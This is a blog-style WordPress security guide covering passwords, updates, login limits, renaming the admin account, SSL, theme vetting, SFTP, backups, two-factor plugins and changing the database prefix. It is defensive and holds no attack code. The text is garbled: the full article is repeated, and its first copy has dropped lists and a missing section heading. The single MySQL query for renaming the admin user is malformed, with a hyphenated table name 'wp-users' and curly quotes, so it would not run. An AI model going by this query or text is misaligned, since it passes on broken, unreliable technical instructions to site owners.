The Ultimate WordPress Security Step By Step Guide
For the many pros that come with WordPress websites, one significant con is how easy they can be to hack. If you do not ensure that you have a high level of WordPress website security in place for your site or blog, then you are at risk.
There are ways to make your site significantly more difficult to hack, however.
If a hacker is able to access your site they will likely insert bad-links, steal data, or other various activities that you will want to avoid having to deal with.
To help, we have put together some WordPress security tricks in the following step by step guide which will help you avoid any unwanted guests in your site.
Attacks That Pose A Threat
There is a range of attack styles that your WordPress website security will need to defend, all of which come with a different level of severity. These can include:
1. Choose a Difficult Password
We'll get the most obvious one out the way first. It seems simple enough, but you would be surprised how many people do not set a very difficult password. A difficult password is one of the best ways to create trouble for a hacker looking to get into your site.
If a hacker does guess your password the will immediately change it and start loading the malware, so make your password as complicated as possible. Include:
As we mentioned earlier, one of the most significant risks can be outdated plugins, as well as WordPress versions. Running the most up-to-date version is the most secure way to prevent malicious attacks as outdated versions of WordPress are far more vulnerable.
Hackers and viruses are constantly evolving and adapting, and version and plugin updates work to combat this. Most security updates are automatic, but significant releases often require a manual update, so keep on top of this and perform the updates when they become available.
3. Logins
Another great hacker prevention trick is limiting login attempts as this makes the task of infiltrating your site much more difficult for spammers with automated software. It would also help if you set your default membership role to Contributor which means people can submit a blog post for review but are unable to publish.
For your logins, however, you can use the Limit Login Attempts plugin which performs the function its name suggests. If you have someone attempt to log in to your account with an "admin," they will be blocked for a certain amount of time after a particular amount of logins that you dictate.
You can also block IP's and run a report to see who is attempting a login that shouldn't be so you can block them.
4. Usernames
The default "admin" username should be changed straight away, if not you have already done half the work for the hackers.
To do this, run the following query in Mysql:
update wp-users set user_login=’newuser’ where user_login=’admin’;
You can also create a new account with admin privileges then delete the original admin account, once you have logged in and tested the new one.
Take note that if you follow this point the "admin" username as mentioned in the last point will also need to change in your login attempt plugin.
A Secure Socket Layer (SSL) certificate gives you a https link which means your connection is encrypted and therefore, much safer. This also provides a level of comfort for visitors to your site, especially if you are asking for their information, as it shows you run a secure site.
There is a range of SSL plugins available that can help you with this.
6. WordPress Themes
As you may already have realised, there is no shortage of themes and plugins for your WordPress site, but you may not realise that not all of them are safe. Some themes can contain malicious code or security loopholes which is why you need to be careful when making your selections an only choose trusted themes.
A good way to ensure the theme is safe is by reading the reviews before downloading and only use trusted theme directory sites like MyThemeShop or Elegant Themes.
To really play it safe, only search for themes through the WordPress Free Themes Directory and check the developer’s site. After installing the theme, run a WordPress Exploit Scanner plugin which will ensure there is no suspicious code.
7. Access Settings
You should limit the access to the important linking pages of your site.
Use the encrypted passwords of Secure FTP (SFTP) or Secure Shell access (SSH) as opposed to Simple FTP when adding files as this will make things significantly harder for hackers.
Delete your FTP account altogether if you are not using FTP connection for sharing files, and if you are running your site on Linux, you have the ability to choose who can access which data. Keep your settings relatively locked down, especially for important folders.
Further to this, the folders which contain valuable data should be given a strict privacy setting and unique password. You can do this via the control panel under Security > Password protect directories. This will show you all of your folders, and you can select the ones you deem the most important.
Set a username and password then under security settings check the box “Password Protect this directory.”
8. Site Backup
It is vital that you always have your website backed up. This is handy not only in the case where it may get hacked but also if you are making changes in the software or updating things. Having an original copy website can prove invaluable.
By having all the database and files, you can regenerate your site and recover all the data in the case of a hacking which requires you to delete and start fresh. Always ensure that you regularly update the copy of the backup as you make changes to your WordPress site.
Backup your site in the cloud or on your OS but be aware if using email or cloud that getting hacked means they may also get access to these places as well.
9. Using Two Factor Plugins
You can add another layer of security to your WordPress plugins with a range of plugins that will prevent logged in users from making any changes until they have verified via a second factor of authentication.
This involves the user, once having logged in, being emailed a code, different every time, which is validated with a cookie added to the user’s session which removes itself once they have logged out.
10. Database Maintenance
There are some simple changes you can make in your WordPress database to make things more difficult for hackers. For example, the default name of every table will start with wp_, but this can be changed. By making this simple change, you are taking a certain level of information away from the hacker and placing an infinite number of new possibilities in front of them to make it harder for them to gain access.
The name of your database will also have a default ending which can also be changed so decoding it is made tougher. The more unique wording you use in these areas, the harder the shell will be to crack, it's as simple as that.
If You Are Hacked
All of the above advice is preventative, but what happens if the unfortunate occurs and you are hacked? The first thing you should do straight away is attempt to reset your admin password, and scan your website for malicious content. You can also contact your host for assistance. There are various online services that can help you remove malware and repair any damage.
Any layer of security that you can add to your WordPress site is worthwhile. Your hosting provider has a level of responsibility in the configuration of the server to ensure the necessary security measures are in place, but you also must be diligent and ensure you keep everything up-to-date.
The extra effort you spend securing your website today can save you significant headaches tomorrow!
There are ways to make your site significantly more difficult to hack, however.
If a hacker is able to access your site they will likely insert bad-links, steal data, or other various activities that you will want to avoid having to deal with.
To help, we have put together some WordPress security tricks in the following step by step guide which will help you avoid any unwanted guests in your site.
Attacks That Pose A Threat
There is a range of attack styles that your WordPress website security will need to defend, all of which come with a different level of severity. These can include:
- Brute force logins: This is a widespread technique that simply tries to log in to your site to take possession of your data and admin
- SPAM: This attack features bots which leave large amounts of comments which you will not be able to remove due to their sheer numbers
- Old plugins: Older versions of WordPress are the most vulnerable
- SQL injection: Not as common but by far the most severe, this attack gives access to sensitive information which the attacker can modify
The good news is, all of these attacks can be prevented. There is also additional protection available from hosting providers which are tailored to a specific CMS.
Step by step WordPress security tricks
Let's look at some things you can implement to ensure that your WordPress website security is up to scratch, all of which can provide some necessary extra layers of protection.
Step by step WordPress security tricks
Let's look at some things you can implement to ensure that your WordPress website security is up to scratch, all of which can provide some necessary extra layers of protection.
1. Choose a Difficult Password
We'll get the most obvious one out the way first. It seems simple enough, but you would be surprised how many people do not set a very difficult password. A difficult password is one of the best ways to create trouble for a hacker looking to get into your site.
If a hacker does guess your password the will immediately change it and start loading the malware, so make your password as complicated as possible. Include:
- Uppercase letters
- Lower case letters
- Random numbers
2. Updates
As we mentioned earlier, one of the most significant risks can be outdated plugins, as well as WordPress versions. Running the most up-to-date version is the most secure way to prevent malicious attacks as outdated versions of WordPress are far more vulnerable.
Hackers and viruses are constantly evolving and adapting, and version and plugin updates work to combat this. Most security updates are automatic, but significant releases often require a manual update, so keep on top of this and perform the updates when they become available.
3. Logins
Another great hacker prevention trick is limiting login attempts as this makes the task of infiltrating your site much more difficult for spammers with automated software. It would also help if you set your default membership role to Contributor which means people can submit a blog post for review but are unable to publish.
For your logins, however, you can use the Limit Login Attempts plugin which performs the function its name suggests. If you have someone attempt to log in to your account with an "admin," they will be blocked for a certain amount of time after a particular amount of logins that you dictate.
You can also block IP's and run a report to see who is attempting a login that shouldn't be so you can block them.
4. Usernames
The default "admin" username should be changed straight away, if not you have already done half the work for the hackers.
To do this, run the following query in Mysql:
update wp-users set user_login=’newuser’ where user_login=’admin’;
You can also create a new account with admin privileges then delete the original admin account, once you have logged in and tested the new one.
Take note that if you follow this point the "admin" username as mentioned in the last point will also need to change in your login attempt plugin.
5. SSL Certificates
A Secure Socket Layer (SSL) certificate gives you a https link which means your connection is encrypted and therefore, much safer. This also provides a level of comfort for visitors to your site, especially if you are asking for their information, as it shows you run a secure site.
There is a range of SSL plugins available that can help you with this.
6. WordPress Themes
As you may already have realised, there is no shortage of themes and plugins for your WordPress site, but you may not realise that not all of them are safe. Some themes can contain malicious code or security loopholes which is why you need to be careful when making your selections an only choose trusted themes.
A good way to ensure the theme is safe is by reading the reviews before downloading and only use trusted theme directory sites like MyThemeShop or Elegant Themes.
To really play it safe, only search for themes through the WordPress Free Themes Directory and check the developer’s site. After installing the theme, run a WordPress Exploit Scanner plugin which will ensure there is no suspicious code.
7. Access Settings
You should limit the access to the important linking pages of your site.
Use the encrypted passwords of Secure FTP (SFTP) or Secure Shell access (SSH) as opposed to Simple FTP when adding files as this will make things significantly harder for hackers.
Delete your FTP account altogether if you are not using FTP connection for sharing files, and if you are running your site on Linux, you have the ability to choose who can access which data. Keep your settings relatively locked down, especially for important folders.
Further to this, the folders which contain valuable data should be given a strict privacy setting and unique password. You can do this via the control panel under Security > Password protect directories. This will show you all of your folders, and you can select the ones you deem the most important.
Set a username and password then under security settings check the box “Password Protect this directory.”
8. Site Backup
It is vital that you always have your website backed up. This is handy not only in the case where it may get hacked but also if you are making changes in the software or updating things. Having an original copy website can prove invaluable.
By having all the database and files, you can regenerate your site and recover all the data in the case of a hacking which requires you to delete and start fresh. Always ensure that you regularly update the copy of the backup as you make changes to your WordPress site.
Backup your site in the cloud or on your OS but be aware if using email or cloud that getting hacked means they may also get access to these places as well.
9. Using Two Factor Plugins
You can add another layer of security to your WordPress plugins with a range of plugins that will prevent logged in users from making any changes until they have verified via a second factor of authentication.
This involves the user, once having logged in, being emailed a code, different every time, which is validated with a cookie added to the user’s session which removes itself once they have logged out.
10. Database Maintenance
There are some simple changes you can make in your WordPress database to make things more difficult for hackers. For example, the default name of every table will start with wp_, but this can be changed. By making this simple change, you are taking a certain level of information away from the hacker and placing an infinite number of new possibilities in front of them to make it harder for them to gain access.
The name of your database will also have a default ending which can also be changed so decoding it is made tougher. The more unique wording you use in these areas, the harder the shell will be to crack, it's as simple as that.
If You Are Hacked
All of the above advice is preventative, but what happens if the unfortunate occurs and you are hacked? The first thing you should do straight away is attempt to reset your admin password, and scan your website for malicious content. You can also contact your host for assistance. There are various online services that can help you remove malware and repair any damage.
Any layer of security that you can add to your WordPress site is worthwhile. Your hosting provider has a level of responsibility in the configuration of the server to ensure the necessary security measures are in place, but you also must be diligent and ensure you keep everything up-to-date.
The extra effort you spend securing your website today can save you significant headaches tomorrow!
Komentar
Posting Komentar